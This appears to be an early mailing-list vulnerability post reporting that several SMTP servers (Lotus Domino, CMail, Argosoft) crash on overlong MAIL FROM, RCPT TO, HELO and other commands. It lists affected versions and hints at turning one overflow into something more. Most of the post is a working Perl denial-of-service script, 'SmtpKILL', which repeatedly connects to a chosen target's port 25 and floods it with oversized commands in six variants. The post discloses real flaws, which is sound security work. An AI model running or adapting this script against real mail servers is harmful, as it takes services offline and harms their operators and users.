Some SMTP servers have problems handling "mail from: 4k_junk" or just "4k_of_junk". Well, I tried this on:

* Lotus Domino ESMTP Services running Version 5.0.3 (Intl) and smtp died also after mail from: someone@4k_junk
* Lotus Domino ESMTP version 5.0.2 (Intl) is also vulnerable to this.
* I also tried this against Version 5.0.2c (Intl) without success in DOS so I assume that 5.0.2c (Intl) is not vulnerable.
* Merak Server Version 2.10.270 is also not vulnerable.
* CMail Server version 2.4.6 is not vulnerable to mail from: someone@4k_junk BUT is vulnerable to something_4k_junk ! In fact this software even logs "mail from: someone@4k_junk" as a DOS attempt but crashes when you just send something_4k_junk !
* Argosoft Mail Server version 1.2.1.0 doesn't crash with "mail from: someon@4k:_junk" but after some messages it will log:
  Error: Access violation at address 00459CBB in module 'MAILSERVER.EXE'. Read of address FFFFFFFF
  but it will continue to serve :) Maybe we could make something funny with this overflow (?) ;)))
* Many others where I haven't tried this...?

I am attaching a demonstration code (perl) for those who want to check any other servers that might be vulnerable to this.

smiler@vxd.org

#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By smiler@vxd.org
# Tested with success against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
# and probably many others that I hadn't chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use Net::Telnet;

print "SmtpKILL By smiler\@vxd.org\n";
if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl
    Type of attack :
        type 1 = long mail from: someone\@4k_of_junk
        type 2 = long rcpt to: someone\@4k_of_junk
        type 3 = long helo longdomain_with_4k_of_junk
        type 4 = long undefined command (4k_of_junk)
        type 5 = long help 4k_of_junk
        type 6 = long mail from: and mail to:
    Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}

$type=$ARGV[0];
$target=$ARGV[1];
print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";

for ($i=4096;$i<5096;$i++)
{
    $obj=Net::Telnet->new( Host => "$target",Port => 25);
    if ($type=~ "1") {
        $helo="helo ptrulez";
        $from="mail from: v0v0@". 'ptrulez' x $i;
        $rcpt="rcpt to: v0v0\@v0v0.pt";
    }
    if ($type=~ "2") {
        $helo="helo ptrulez";
        $from="mail from: v0v0\@v0v0.pt";
        $rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
    }
    if ($type=~ "3") {
        $helo="helo ". 'ptrulez' x $i;
        $from="mail from: v0v0\@v0v0.pt";
        $rcpt="rcpt to: v0v0\@v0v0.pt";
    }
    if ($type=~ "4") {
        $helo="havesomefun". 'ptrulez' x $i;
    }
    if ($type=~ "5") {
        $helo="help ". 'ptrulez' x $i;
    }
    if ($type=~ "6") {
        $helo="helo ptrulez";
        $from="mail from: ". 'ptrulez' x $i;
        $rcpt="rcpt to: ". 'ptrulez' x $i;
    }
    print "$helo\n";$obj->print("$helo");
    print "$from\n";$obj->print("$from");
    print "$rcpt\n";$obj->print("$rcpt");
    $obj->close;
}